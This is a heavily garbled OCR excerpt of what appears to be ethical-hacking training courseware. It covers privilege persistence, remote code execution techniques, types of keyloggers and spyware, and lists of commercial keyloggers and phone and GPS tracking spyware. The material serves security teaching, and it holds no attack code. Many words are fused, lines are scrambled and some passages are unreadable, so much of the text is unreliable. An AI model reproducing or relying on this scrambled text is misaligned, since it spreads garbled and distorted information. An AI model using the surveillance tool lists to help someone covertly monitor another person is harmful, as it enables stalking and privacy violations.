TInspectre Spectre
& MeltdownChecker
ical andCountermensores
Mackin ©by E-Comel
Copyright
Spectre
Infpecte: Check
Metdown
and Prtecton
sriprocessorharore
InSpectre sey.
Spectre
& MeltdownVulnerability
Status
systemMtdownprotected:
is NO!
‘System
is Spectre
protected:NO!
MicrocodeUpdateAvailable
Performance:GOOD
CPUID:306¢3
Figure6200: showing
Screenshotof nspectre andMeltdown
Spectre vulnerabilities
& MeltdownChecker
Spectre
Source:https://github.com
Spectre & MeltdownChecker is a shellscriptto determine whethera systemis
vulnerableagainst various “speculative
execution― the script
CVEs.For Linux systems,
will detect mitigations, includingbackported non-vanillapatches, regardless of the
advertisedkernelversion numberor the distribution(such as Debian,Ubuntu,CentOS,
RHEL,
‘As
Fedora,
openSUSE,
Arch,
etc.)
shownin the screenshot, securityprofessionals
use Spectre& MeltdownCheckerto
determine
tool helps
place.
whether the system
them in verifying
is immune to speculative
execution vulnerabilities.This
whetherthe systemhasthe knowncorrect mitigations in
ical andCountermensores
Mackin ©by E-Comel
Copyright
6201:
Figure
of Checkershowing
Screenshot Spectre&Meltdown Spectre
and
Meltdown
vunerabilti
6102: &Meltdown
Figure
showing
and
Meltdown
Screenshotof Spectre Checker Spectre vulnerabiltie:
ModuleFlow
1 3 EscalatingPrivileges
System
Hacking
Concepts
B® came
e
Access
Maintaining
Aftergaining access and escalating on the targetsystem,
privileges now attackerstry to
maintain their access for further exploitation
of the targetsystem or makethe compromised
systema launchpad fromwhichto attackother systems remotely
i n the network.Attackers
execute maliciousapplicationssuchas keyloggers, spyware, and other maliciousprograms to
maintain theiraccessto thetargetsystem andstealcriticalinformationsuchas usernamesand
passwords. Attackershidetheir maliciousprograms or filesusing rootkits,
steganography,
NTFS
their
datastreams,etc. to maintain
access
to thetargetsystem.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Executing
Applications
|G Whenattackers executemalicious “owning―
its called
applications thesytem
|G. Theattacker
executesmaliciousprogramsremotely
the
inthevictim'smachine t o gather information
that
access t o sytem resources, crackthe password,
to
otation or loss
of privacy gainunauthorized
thescreenshots,instalbackdoor maintaineas access, et.
capture
Programs
‘Malicious that
Attackers
Execute on TargetSystems
Spyware
Executing
Applications
Onceattackersgainhigher privileges
in the targetsystem bytryingvarious privilegeescalation
attempts,theymayattemptto execute a maliciousapplication byexploitinga vulnerability
to
execute arbitrary code.Byexecuting malicious applications, the attackercan steal personal
information, gain unauthorizedaccess to systemresources, crack passwords, capture
screenshots, install abackdoorformaintaining easyaccess, etc.
Attackersexecute maliciousapplications at this stage i n a processcalled“owning―
the system.
Oncetheyacquireadministrativeprivileges, theywill execute applications. Attackersmayeven
tryto do so remotely on the victim'smachine to gather the same informationas above.
‘The
maliciousprograms
attackersexecute on targetsystems
can be:
=
Backdoors: designed
Program to deny disrupt
leadsto exploitation
the
or operation,
gather
or lossof privacy, or gain unauthorized
access to system
resources.
information
that
ical andCountermensores
Mackin ©by E-Comel
Copyright
RemoteCodeExecutionTechniques
network.
and furtherexpanding
a systeminitially are
Thesetechniquesoften performed
access to remote systems
after compromising
presento n the target
Someexamples
of remote codeexecution techniques
are as follows:
‘=
Exploitation
forClientExecution
Insecure codingpracticesi n software can
make it vulnerable to various attacks.
Attackerscan exploit vulnerabilities
theseunderlying in software
through focusedand
targeted with an objective
exploitations of arbitrary
codeexecution to maintain access
tothetargetremote system
Differenttypesof exploitations
for clientexecution are as follows:
© Exploitation
Web-Browser-Based
Attackers targetweb browsers through spearphishing links and drive-by
compromise.The remote systemsc an be compromised throughnormalweb
browsingor through severalusers who are targetedvictims of spearphishing
linksto
sites usedto exploit
attacker-controlled the web browser. Thistypeof exploitation
doesnot needuser intervention for execution,
Office-Applications-Based
Exploitation
Attackerstargetcommon officeapplicationssuch as MicrosoftOfficethrough
different variants of spearphishing.
Emailscontaining
links to maliciousfiles are
ical andCountermensores
Mackin ©by E-Comel
Copyright
directly for downloading.
sent to the end-users To run the exploit,
end-usersare
required
to open a malicious
‘Third-Party
document
Applications-Based
file. or
Exploitation
can alsoexploitcommonly
‘Attackers usedthird-party
applications
deployed
as part
of the software.Applicationssuchas AdobeReader,
Flash,
etc. are usually
targeted
byattackers to gainaccessto remote systems,
ScheduledTask
Scheduledtasks allow users to performroutine tasks chosenfor a computer
automatically.Thereare two utilities,at and schtasks,that can be usedalong with
WindowsTaskScheduler to execute specific
codeor scriptat a scheduled
dateandtime.
Using task scheduling,attackerscan executemalicious programsat system startup,
or
scheduleit for a specificdate and time to maintain accessto the targetsystemand
further perform r emote code execution to gain admin-levelprivileges
to the remote
system.
ServiceExecution
System services are programs
run binary
as
filesor commands
that run and operate
thatcan communicatewithWindowssystem
Thiscodeexecution technique
ServiceControlManager.
of
at the backend an OS.Attackers
is performed
services such
bycreating a
new service or bymodifying service at the time of privilege
an existing escalationor
maintaining
access (WMI)
WindowsManagement
Instrumentation
WMI is a featurei n Windows administrationthat managesdata and operations on
WindowsOSsand provides a platform for accessingWindowssystem resources locally
andremotely. Attackers can use the WMI featureto interact with the targetsystem
remotely,and use it to performinformationgathering on systemresources andfurther
execute codefor maintaining
Windows (WinRM)
RemoteManagement
to
access the targetsystem
ical andCountermensores
Mackin ©by E-Comel
Copyright
Toolsfor Executing
Applications
‘ar
|
roapepoy
the
target
filesbyselecting
and
the OS file to beexecuted.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure6.208
Screenshot
ofRemote
Someof the privilege
escalationtoolsare listedas follows:
*
(https://aithub.com)
Pupy
+
PDQDeploy
(https://www-pda.com)
+
Dameware (https://www.dameware.com)
RemoteSupport
Manage€ngineCentral(https://www.manageengine.com)
Desktop
PsExec(https://docs.microsoft.com)
Module
Page 6 698
tical
Making
and by CountermensoresCopyright©
Comet
Keylogger
"ero oe
ara arr
teres 8
eee st mantr ach tobe a he eon EE om
sh ong
1 Leginr
ppeton nce fe snl tng tment employee ate ea
(alow
«rps
nace
we
eet
een
ped inrmton
th ln
thera
women
ath
sod
opting tm
ating et chara
a OS
& —— Beene
a
=
Keylogger
Keyloggers
are softwareprograms or hardwaredevicesthat recordthe keys struckon the
keyboard
computer (alsocalledkeystroke logging)
of an individualcomputer user or a network
You can view all the keystrokes
of computers. of the victim'scomputer at any time in your
systembyinstalling
thishardwaredeviceor program.It recordsalmostall the keystrokes on a
keyboard
of a user and saves the recordedinformationin a text file. As keyloggers hide their
and interface,
processes the targetis unaware of the keylogging. Officesand industriesuse
keyloggers
to monitor employees’computeractivities, and theycan alsobe usedin home
environments for parents
to monitor children’s
Internet activities.
=~
= (| 2.5.
2 OF
Ze a
==
oe
Figure
6.104:Demonstration
of keylogger
A keylogger,
when associatedwith spyware, helps to transmit a user'sinformationto an
unknownthird party.Attackersuse it illegally
formaliciouspurposes,suchas stealing sensitive
and confidentialinformationabout victims. This sensitive informationincludesemail IDs,
passwords,banking details,chatroom activity,Internetrelaychat(IRC},
instant messages, and
bankand creditcardnumbers.Thedatatransmittedover the encrypted Internet connection
Module
6 629
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
are also vulnerable to keylogging becausethe keylogger tracksthe keystrokesbefore
encryption.
keylogger
‘The systeminvisibly
programis installedonto the user’s throughemailattachments
or “drive-by―
downloadswhen users visit certain websites.Physical
keystrokeloggers“sit―
betweenkeyboard
hardwareandthe OS,so that theycan remain undetectedandrecordevery
keystroke.
A keylogger
can:
=
typed
Recordevery keystroke on theuser'skeyboard
at regular
Capture screenshots showing
intervals, suchas typed
user activity characters.
or clickedmouse buttons
Trackthe activities of users bylogging
Windowtitles,names of launchedapplications,
andotherinformation
Monitor the onlineactivityof users byrecording
addresses
of the websitesvisitedand
with keywords
entered
Recordall login names, bankandcreditcardnumbers, including
andpasswords, hidden
passwords or datadisplayed
in asterisks
or blankspaces.
Recordonlinechatconversations
Makeunauthorizedcopiesof both outgoing
andincomingemailmessages
ical andCountermensores
Mackin ©by E-Comel
Copyright
of Keystroke
Types Loggers
of Keystroke
Types Loggers
A keylogger is a hardwareor softwareprogram that secretly
recordseachkeystroke on the user
keyboard at any time. Keyloggers save capturedkeystrokesto a file for readinglater,or
transmit them to a place wherethe attackercan access it. Astheseprogramsrecordall the
keystrokes that are provided througha keyboard,theycan capturepasswords, creditcard
numbers, email addresses, names, postaladdresses,and phone numbers.Keyloggers can
captureinformationbefore itis encrypted.
Thisgivesthe attackeraccess to passphrases and
other“well-hidden―
information,
——_|
Lm
rcjuos
nee
‘gone =
ical andCountermensores
Mackin ©by E-Comel
Copyright
are two typesof keystroke
‘There hardwarekey
loggers: andsoftwarekeyloggers.
loggers Both
typeshelpattackersto recordall keystrokes
enteredon the target
system.
HardwareKeystroke Loggers
keyloggers
Hardware are hardware
devices
thatlooklikenormalUSBdrives.Attackers
can connect these keyloggers
betweena keyboard
plugand a USBsocket.All the
keystrokes
bytheuser are storedi n the hardware
unit. Attackersretrieve thishardware
unit to access the keystrokes
that are storedi n it. The primary advantage
of these
loggers antivirus,or desktop
is that no anti-spyware, programcan detectthem.
security
Theirdisadvantage
is the easydiscovery
of their physical
presence.
Thereare threemain typesof hardwarekeystroke
loggers:
>
PC/BIOS Embedded
BlOS-levelfirmwarethat is responsible for managingkeyboard actions can be
modifiedin sucha way that it capturesthe keystrokes
that are typed. It requires
physical
and/or admin-level
accessto the targetcomputer.
Keylogger
Keyboard
If the hardwarecircuit is attachedto the keyboard cableconnector,i t can capture
the keystrokes.
beaccessed
‘can
keylogger
It recordsall the keyboard
later.Themain advantage
is that it is not OS dependent
strokesto its own internal
a
of hardwarekeylogger
and,hence,
memorythat
over a software
will not interferewith any
applications running on the targetcomputer, and it is impossible to discover
hardwarekeyloggers byusinganyanti-keyloggersoftware.
Keylogger
External
External are attachedbetweena standardPCkeyboard
keyloggers and a computer.
They
recordeachkeystroke.
Externalkeyloggers
do not needany softwareandwork
with anyPC.Youcan attachone to yourtargetcomputerandmonitor the recorded
informationon your PCto look through the keystrokes.
Thereare four typesof
externalkeyloggers:
*
PS/2andUSBKeylogger: Thisis completely
transparent
to computeroperation
andrequiresno softwareor driversfor functionality.
It recordsall the keystrokes
typed
bythe user on the computer keyboard,and stores data suchas emails,
chatrecords, used,IMs,etc.
applications
Acoustic/CAM Acoustic keyloggers
Keylogger: work on the principleof
electromagnetic
converting sound waves into data. They
employ either a
capturing of converting
receiver capable the electromagnetic
soundsinto the
keystroke
data,ora CAM (camera) capable
of recording screenshots
of the
keyboard.
BluetoothKeylogger:
Thisrequiresphysical
accessto the targetcomputeronly
once, at the time of installation.After installationo n the targetPC,
it stores all
ical andCountermensores
Mackin ©by E-Comel
Copyright
the keystrokes
and you can retrieve the keystroke
information
i n real-time
by
via a Bluetoothdevice.
connecting
Wi-FiKeylogger: BesidesstandardPS/2 and USBkeylogger functionality,
this
remote accessover theInternet,Thiswirelesskeylogger
features will connect to
a localWi-Fiaccess pointand sendemailscontaining the recordedkeystroke
data.Youcan alsoconnect to thekeylogger andview the
at anytime over TCP/IP
captured
log.
SoftwareKeystroke
Loggers.
Theseloggers are thesoftwareinstalledremotelyvia a networkor emailattachment i n
a targetsystem for recording Here,the logged
all the keystrokes. informationis stored
as a log
file on a computer harddrive.Thelogger sendskeystroke logsto the attacker
using emailprotocols. Softwareloggers can often obtain additionaldata as well,
because theydo not havethe limitationof physical memory allocation,
as do hardware
keystroke
loggers.
Thereare four typesof softwarekeystroke
loggers:
©. Application
Keylogger
application
‘An keylogger
allowsyou to observeeverything
the user i n his/her
types
emails,chats,
and other applications,
including
passwords.
It is even possible
to
trace recordsof Internet activity. Thisis an invisiblekeylogger to trackand record
everything happening withinthe entire network
Kernel/Rootkit/Device DriverKeylogger
Attackersrarely use kernelkeyloggers because theyare difficultto write andrequire
a high levelof proficiency fromthe keylogger developers.Thesekeyloggers existat
the kernellevel.Consequently, theyare difficult to detect,especially for user-mode
applications. Thiskindof keylogger acts as a keyboard devicedriverandthus gains
to all informationtyped
‘access o n the keyboard.
The rootkit-basedkeylogger
is a forged
Windowsdevicedriver that recordsall
keystrokes.Thiskeylogger
hidesfromthe systemand is undetectable,
even with
standardor
dedicated
tools.
Thiskind of keylogger usually
acts as a devicedriver. Thedevicedriver keylogger
replaces the existing1/O driverwith the embeddedkeylogging functionality,
This
keylogger saves all the keystrokesperformed on the computer into a hiddenlogon
file,andthensendsthefile to thedestinationthrough the Internet.
Hypervisor-Based
Keylogger
A hypervisor-based
keylogger
workswithin a malwarehypervisor
operating
on the
os,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Form-Grabbing-Based
Keylogger
A form-grabbing-basedkeylogger
recordsweb formdataand then submitsit over
after bypassing
the Internet, HTTPSencryption.Form-grabbing-based
keyloggers
log
forminputsbyrecording
‘web web browsing event―
on the “submit function.
JavaScript-Based
Keylogger
AttackersinjectmaliciousJavaScript tags o n the web page of a compromised
websiteto listento keyevents suchas onkeyUp() andonKeyDown(). Attackers use
various techniques suchas man-in-the-browser, cross-sitescripting,
etc. to inject
malicious
script.
Keylogger
Memory-Injection-Based
Memory-injection-based
keyloggersmodifythe memorytablesassociatedwith the
web browserand systemfunctionsto logkeystrokes.
Attackersalso use this
technique
to bypass
UACin Windowssystems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
HardwareKeyloggers
KEYGRABBER
CLASSIC
USB.
Hardware Keyloggers
Wenow examine the detailsof externalhardwarekeyloggers. previously,
Asdiscussed there
typesof externalhardwarekeyloggers
are various availableo n the market.Thesekeyloggers
are plugged
in linebetweena keyboard
anda computer.
‘These of keyloggers
types include:
=
=
PS/2
keylogger
USBkeylogger
=
*
embedded
Keylogger
Bluetooth
keylogger the inside keyboard
=
keylogger
WiFi
Thesekeyloggers monitor and capture
+
Hardware
the keystrokes
keylogger
of the targetsystem.Astheseexternal
keyloggers attachbetweena usualPCkeyboard anda computerto record eachkeystroke,
they
will remain undetectablebythe anti-keyloggers
installedo n the targetsystem.
However,the
user can easilydetecttheirphysical
presence,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure
6.106:
Different keyloggers
yas ofhardware
Hardwarekeyloggers from
come numerous manufacturers and vendors,
some of which are
=
as
discussedfollows:
KeyGrabber
Source:https://www.keydemon.com
A KeyGrabber
hardware keylogger
is an electronicdevice capable of capturing
froma PS/2
keystrokes It comes in various forms,
or USBkeyboard. suchas KeyGrabber
KeyGrabber
USB, PS/2,
andKeyGrabber
Nano Wi-Fi
KEYGRABBER
CLASSIC
USB.
Hardware keylogger
bydefinition
6.107Screenshot
Figure of KeyGrabber
hardware
keylogger
ical andCountermensores
Mackin ©by E-Comel
Copyright
keyloggers
Somehardware are listedas follows:
=
USB(http://www.keelog.com)
KeyGrabber
+
(http://www.keycarbon.com)
KeyCarbon
=
Keyllama
Keylogger
(https://Keyllama.com)
Keyboard
logger
(https://www.detective-store.com)
KeyGhost
(http://www.keyghost.com)
6
Modul Pag0707
tical
Making
and by
CountermensoresCopyright©
Comet
forWindows
Keyloggers
eplopger |
your
ontario Pte nee
06 ena Montr
‘tin
ve Heeger
berEtmwre
Whe
for Windows
Keyloggers
the keyloggers
Besides mentionedpreviously,
there are many softwarekeyloggers
availableon
the market;you can use thesetoolsto recordthe keystrokes andmonitor the activityof
computer users. Somekeyloggers
are discussed
as follows.Youcan downloadthesetoolsfrom
websites.
their respective
=
Keylogger
Spyrix Free
Source:http://www.spyrix.com
SpyrixKeylogger Free is usedfor remote monitoring o n a computer that includes
recordingof keystrokes, andscreenshots.
passwords, Thiskeyloggeris perfectly
hidden
fromantivirus,anti-rootkit,
andanti-spywaresoftware.
Attackersuse the Spyrix Keylogger
Free tool to recordall the keystrokes
on the victim
froma remote system.
system
ical andCountermensores
Mackin ©by E-Comel
Copyright
Someof the keyloggers
Figure
of
6 108;Screenshotpyri Keylogger
for Windowsa re listedas follows:
=
REFOGPersonal
Monitor (https://www.refog.com)
All In One Keylogger
(http://www.relytec.com)
Elite (https://ww.elitekeyloggers.com)
Keylogger
Standard(https://www.staffcop.com)
StaffCop
(https://www.spytector.com)
Spytector
Module
6 702
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
for Mac
Keyloggers
for Mac
Keyloggers
Thereare various keyloggers
availableon the marketthat run on MacOS.Thesedownloadable
toolscan assistan attackeri n recording
keystrokes
andmonitoring activities.They
users’ enable
you to recordeverything suchas keystroke
the user doeson the computer, logging,recording
emailcommunication,
Thefollowing
keystroke
chatmessaging,
loggers
are specifically
taking
usedon MacOS:
of
screenshotseach activity,
andmore.
=
Refog
MacKeylogger
Source:https://www.refog.com
Refog Mac Keylogger provides undetectedsurveillanceandrecordsallthe keystrokeson
the computer. Asshownin the screenshot, the attackersuse the RefogMac Keylogger
user andstealcriticalinformationsuchas login
to recordall the activities of the target
credentials.
ical andCountermensores
Mackin ©by E-Comel
Copyright
GBvom see
©
wes
peo
@ saves
vane
@ sraem tts
Figure6109:
Screenshot
of Amac
Keylogger
Someof the keyloggers
for Macare listedas follows:
=
Keylogger
Spyrix For Mac 05 (http://www.spyrix.com)
Elite KeyloggerMac (https://www.elite-keylogger.net)
for
=
(https://www.easemon.com)
AoboMacOSX Keylogger
for MAC(http://kidlogger.net)
KidLogger
PerfectKeylogger
for Mac(https://www.blazingtools.com)
Module
6 741
Page tical MakingandCountermensores
by Comet
Copyright©
Spyware
7
ts thea Tojan
Inert
horse,w hch usualy
for downlad hidden
bundled
asa
of programs
eeware
component tht can bearableon
Spyware
Propagation
Dive
by
downoad softwareinstaation
Pigybucked
browser
Web
vunerablty expos cookies
Spyware
Spyware is stealthy computer softwarethat allowsyou to secretly
monitoring recordall the
It automaticaly
computer.
user activitieson a target deliverslogs
to the remote attackerusing
the Internet (viaemail,FTP,commandandcontrolthrough encrypted HTTP,
traffic, DNS, ete.)
The deliverylogsincludeinformationaboutall areas of the system,suchas emailssent,
websitesvisited,every keystroke (includinglogins/passwords for Gmail,Facebook, Twitter,
Linkedin,
etc),file operations,andonlinechatconversations. It alsotakesscreenshots at set
interval,
Trojan just
like
horse,
downloaded
a surveillance
which is usually
camera aimed thecomputer
at monitor. Spyware
bundled as a hidden component
similar
of freewareor software
fromthe Internet.It hidesits process,files,andother objects to avoiddetection
is to
a
andremoval.Thisallowsan attackerto gather informationabout a victim or organization, such
asemailaddresses, user logins,
passwords, creditcardnumbers, banking credentials,etc.
=
Spyware Propagation
As its name implies,
spyware is installedwithout user knowledge andthis
or consent,
can be accomplished
by“piggybacking―
the spywareonto otherapplications.
Thisis
possible becausespyware uses advertising cookies,which is one of the spyware
subclasses. Spyware can alsoaffectyour system whenyou visit a spywaredistribution
website.Because
process
i t installs
i s knownas “drive-by itself
whenyou visit andclicksomething
downloading.―
on a website,
this
ical andCountermensores
Mackin ©by E-Comel
Copyright
WhatDoestheSpyware
Do?
Wehavealready discussedspywareandits main functionof watching user activities on
a targetcomputer. We alsoknowthat once an attackersucceeds i n installing spyware
on a victim’s
computerusingthe propagation techniques
discussed earlier,theycan
perform Therefore,
severaloffensiveactions to the victim'scomputer. let us now learn
more aboutthe capabilitiesof spyware,a s we are now aware of its ability to monitor
user activities.
Theinstalledspyware can alsohelpthe attackerperform
the following
on target
computers:
©
personal
Stealsusers’ informationandsendsit to a remote server or hijacker
>
Monitors users’
onlineactivity
©
Displays
annoying
pop-ups
Redirects
a webbrowserto advertising
sites
Changes
thebrowser's
d efault and the user fromrestoring
setting prevents it
‘Adds
severalbookmarks
to the browser's
favoriteslist
overallsystem
Decreases level
security
Reduces performance
system instability
andcausessoftware
to remote pornography
Connects sites
desktop
Places shortcutsto maliciousspyware sites
Stealsyourpasswords
Sends
you
targeted
Changes
email
thehomepageandprevents the user fromrestoring
i t,
Modifiesthe dynamically
linkedlibraries(DLLs)andslowsdownthe browser,
Changes
firewallsettings
Monitors andreports
websitesyou visit
ofSpyware
Types
Today,various spywareprogramsengagein a varietyof offensive tasks,suchas
changing displaying
browsersettings, ads,collectingdata,etc. Thoughmany spyware
perform
applications a diversearrayof benign
activities,ten majortypesofspywareon
the Internet allow attackersto stealinformationabout users and their activities,
all
withouttheirknowledge
or consent.
© Desktop
Spyware
Desktopspyware is softwarethat allowsan attackerto gain informationabout a
user'sactivityor personal
information,sendit via the Internet to third parties
ical andCountermensores
Mackin ©by E-Comel
Copyright
withoutthe user’s
knowledge information
or consent. It provides regarding
what
Desktop
desktops,
networkusers did on their
spyware allowsattackers
how,andwhen,
to perform the following:
#
*
Live recording
ofremote
Recordingmonitoring
and
desktops
Internet activities
*
Recordingsoftwareusageandtimings
*
Recording
an activitylogandstoringi t at one centralizedlocation
Logging users’keystrokes
EmailSpyware
Emailspywareis a programthat monitors, records,andforwardsall incomingand
‘outgoing
emails. that
you
want
Onceinstalledon the computer
of spywarerecordscopiesof all incomingand outgoing
you through a specified
to monitor,thistype
emailsand sendsthemto
emailaddressor saves the informationon the localdisk
folder of the monitoredcomputer. Thisworksi n stealthmode; users will not be
aware of the presenceof email spywareon their computer. It is also capable of
recording (e.g.,
instant messages AIM,MSN,Yahoo, Myspace,Facebook),
InternetSpyware
Internetspywareis a tool that allowsyou to monitor all the web pagesaccessed by
users on your computer i n your absence.It makesa chronological recordof all
visitedURLs.Thisautomatically loadsat systemstartupand runs in stealthmode,
whichmeans that it runs i n the background undetected.Thetool recordsall visited
URLsinto a logfileandsendsit to a specified emailaddress. It providesa summary
reportof overallweb usage, suchas websitesvisited, and the time spento n each
‘website,
as well as all applicationsopened alongwith thedate/time of visits. It also
allowsyou to blockaccess to a specific web page or a n entire websitebyspecifying
the URLsor keywords that youwant to beblocked.
Child-Monitoring
Spyware
Child-monitoring
spywareallowsyou to trackand monitor whatchildrenare doing
‘on computer,both online and offline. Insteadof looking
the over the child's
shoulder, spyware,whichworksi n stealthmode;your
one can use child-monitoring
childrenwill not be aware of
of activity.
your
surveillance.
andwebsitesvisited,counts keystrokes
All the recordeddata are accessible
Thespyware logs
and mouse clicks,
through
all programsused
andcapturesscreenshots
a password-protected
web
interfaceas a hidden, file,or can be sent to a specified
encrypted emailaddress.
Thisalsoallowsyou to protectchildrenfromaccessing inappropriatewebcontent by
settingspecifickeywords that you want to block.It sendsa real-timealert to you
wheneveri t encounters the specifickeywords or wheneveryour
on your computer,
childrenwant to access inappropriatecontent.
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Screen-Capturing
Spyware
Screen-capturing
spywareis a programthat allows you to monitor computer
activities bytakingsnapshotsor screenshots of the computer on whichthe program
is installed.Thesesnapshotsare takenlocally or remotely at specified
time intervals
andeither savedi n a hiddenfile on the localdiskor sent to an emailaddressor FTP
site predefinedbytheattacker.
Screen-capturing
spywareis not onlycapable
of takingscreenshots,
but also
captures keystrokes,mouse activity, visitedwebsiteURLs,
and printeractivitiesi n
computeractivities withoutusers’knowledge.
USBSpyware
USBspywareis a programdesigned forspyingon a computer, whichcopiesspyware
filesfroma USBdeviceonto the harddiskwithout any request or notification.It runs
in hiddenmode,so userswill not beaware ofthe spywareor surveillance.
USB spyware provides a multifaceted solution in the province of USB
filters,
devices,
as it can monitor USBdevices’
‘communications,
etc. that mightdamage
activity
without
creating
the structure of the system driver.
additional
children
It
anddigital
helps
find out with whomthey
to monitor
a re communicating.
ical andCountermensores
Mackin ©by E-Comel
Copyright
software alsoallowslimiting Thislogreporthelps
accessto the printer. attackersto
trace out informationaboutsensitive andsecretdocuments printed,
Telephone/Cellphone
Spyware
Telephone/cellphone
spyware is a software
toolthatgivesyou full accessto monitor
a victim'stelephone
phone.
or cellphone.
It will completely
hide
It will recordandlogall activityon the phone,
messages,and phone
calls.Then,
you
itself
fromthe user of the
suchas Internet use, text
can access the logged
informationvia the
software's or you can alsoreceive tracking
main website, through
information SMS
or email. Usually, this spywarehelpsto monitor and track phoneusageof
‘employees. attackersare usingit to
However, trace informationfrom their target
person's or organization'stelephones/cellphones.
Usingthis spywaredoes not
require any authorizedprivileges.
Themost common telephone/cellphone
spywarefeatures thefollowing:
include
* Call History:
Allows you to view the entire call history
of the phone
(both
incomingandoutgoingcalls)
View Text Messages: Enablesyou to view all incomingand outgoingtext
It even showsdeletedmessages
‘messages. i n the log report.
WebsiteHistory:Recordsthe entire history of all websitesvisited through
the
in the log
phone reportfile.
GPS
Tracking:
Showsyou wherethe phone
the cellphone’s
is i n realtime. There
locationso you can see wherethe phone hasbeen
is also
alog of
It worksas depicted
i n the following
diagram.
FC sae
Figure6110:
Telephone/cellphone
spyware
GPSSpyware
GPSspywareis a deviceor softwareapplication that uses the Global Positioning
System (GPS) to determinethe locationof a vehicle, person,or other attachedor
installedasset.An attackerc an use thissoftwareto trackthe targetperson.
Thisspywareallowsyou to trackthe phone
location
logfile and sendsthem to the specified
targetu ser locationpointsbylogging
points,saves
or
stores
emailaddress.You can then watchthe
into the specified
emailaddress,andviewing
themi n a
ical andCountermensores
Mackin ©by E-Comel
Copyright
emailnotifications
oflocationproximity
alerts.An attacker
traces thelocationofthe
person using GPSspyware,as showni n the following
target figure.
abo. Satelite
set
Transmission
Power
Module
Page
6 718
tical
Making
and by CountermensoresCopyright©
Comet
i}
Tools:Spytech
Spyware andPowerSpy
SpyAgent ¢
Sprfigent|
evertinguses do
onto
conpoer
SpySehmeronyoureonpater
|
7
Mentor
Sottcvty sae
AR.heeseyme
roe
6
Module 719
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
Tools(Cont'd)
Spyware
Viaeo spyware ‘Telephone/Cellphone
Spyware
Tools
Spyware
+
Spytech
SpyAgent
https://www.spytech-web.com
Source:
Spytech
SpyAgent spysoftware
is computer thatallowsyou to monitor everything
users
total secrecy.SpyAgent
do o n your computer—in provides @largearray of essential
computer features,
monitoring as well as website,application,
andchatclient blocking,
logging scheduling,
andremote delivery of logs
via emailor FTP.
showni n the screenshot,
‘As attackersuse SpytechSpyAgent to track the websites
visited,onlinesearchesperformed, programsand apps i n use, file and printing
information, user login
emailcommunication, credentials,
etc. of the targetsystem.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Aernced Ontons
Contant
Fiteog
cna
Soi
View
Ory
How
Actvty
Grape
&
Figure6:12:
Screenshot
ofSpytech
SpyAzent
=
Power Spy
http://ematrixsoft.com
Source:
Power Spy software.It runs and performs
is PC-user activity-monitoring monitoring
in the background
secretly of a computer It logs
system. all users on the systemand
users will not be aware of itsexistence.
showni n the screenshots,
‘As attackers
u se thistool to monitorthe targetsystem
and
recordall user activities, such as screenshots,keystrokes, applicationsexecuted,
windowsopened, websitesvisited,chatconversations, documents opened,etc.
Modul
6 724
Page ical
and ©
Mackin
‘AEN
Promote
Countermensores by E-Comel
Copyright
Reserve.Reproduction
Sty
Spy
Power contre
Thefollowing
is thelistofspyware:
+
Desktop
andChild-MonitoringSpyware
(https://activtrak.com)
ACTIVTrak
9
Veriato
Cerebral (http://mww.veriato.com)
NetVizor(https://www.netvizor.net)
Monitor (https://www.softactivity.com)
SoftActivity
© TSMonitor (https://www.softactivity.com)
SoftActivity
SB Spyware
USB spywaremonitors and analyzes data transferredbetween any USB device
connectedto a computer as well as its applications.
It helpsi n application
development,
USB device drivers,or hardwaredevelopment and offers a powerful platform
for
effectivecoding,
testing,andoptimization,
Thefollowing
is a listof USBspyware:
© (https://www.eltima.com)
USBAnalyzer
©
©
USB
Monitor
(https://www.hhdsoftware.com)
(httpsi//www.nirsoft.net)
USBDeview
USBPortMonitor (https://www.aggsoft.com)
‘Advanced
USBMonitorPro(http://www.usb-monitor.com)
AudioSpyware
spywarehelps
‘Audio to monitor soundandvoice recorders It invisibly
on the system.
starts recording
once it detectsthe soundand automatically
stopsrecording
whenthe
voice disappears.
It can be usedi n recording
conferences, phone
monitoring calls,radio
broadcastinglogs,
spying,andemployee monitoring,
ete.
Thefollowing
isthe lis of audiospyware:
© SpyVoice Recorder mysuperspy.com)
(http://www.
Device(https://www.securityplanet.co)
SpyAudioListening
SpyUSBVoiceRecorder(https://www.securityplanet.co)
(https://www.spytec.com)
VoiceActivatedFlashDriveVoiceRecorder
AudioSpyware (https://www.snooper:se)
Snooper
VideoSpyware
Videospywareis usedforsecret videosurveillance.
An attackercan use thissoftware to
secretly
monitor andrecordwebcams andvideoIM conversations. An attackercan use
video spyware to remotely view webcamsto obtainlive footage of secret
ical andCountermensores
Mackin ©by E-Comel
Copyright
communication. Using can recordandreplay
thisspyware,attackers anything
displayed
on the victim'sscreen.
Thefollowing
is alist of videospyware:
© MovaviVideoEditor(https://www.movavi.com)
Free2xWebcam (http://www,free2x.com)
Recorder
©. (https://www.ispyconnect.com)
iSpy
NETVideoSpy(https:/Avww.sarbash.com)
>
Eyeline
VideoSurveillance (https://www.nchsoftware.com)
Software
Cellphone
Spyware
Like Mobile Spy,a n attacker can also use the following
software programsas
telephone/cellphone
spyware to recordall activities on a phone,
suchas Internet usage,
andphone
text messages, calls
‘Some
©
of
the availabletelephone/cellphone
spywareprograms are
(https://www-phonespysoftware.com)
PhoneSpy
as follows:
0 XNSPY(https://xnspy.com)
© (https://ikeymonitor.com)
iKeyMonitor
OneSpy
(https://www.onespy..in)
(https://thetruthspy.com)
TheTruthSpy
GPSSpyware
Varioussoftwareprogramsa ct as GPSspywareto trace thelocation
of particular
mobile
devices.Attackerscan also employ the followingGPSspywaresoftwareto trackthe
of
location the targetmobiledevices.
of GPSspywareprogramsare listedasfollows:
examples
‘Some
(https://spyera.com)
Spyera
Spy (https://www.mspy.com)
MOBILESPY(http://www.mobile-spy.com)
(https://www.mobistealth.com)
Mobistealth
(https://wwwflexispy.com)
FlexiSPY
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
How to Defendagainst
Keyloggers CEH
ee
papndopening
kona
up aca aid
na
at spy
hep Scanad or
atv rams a he thes etna srs ator
recog
phishing ng,
tha
a mandate them
‘ett
eslpeste
ndash Resse
tring pam sftate peewod
manag
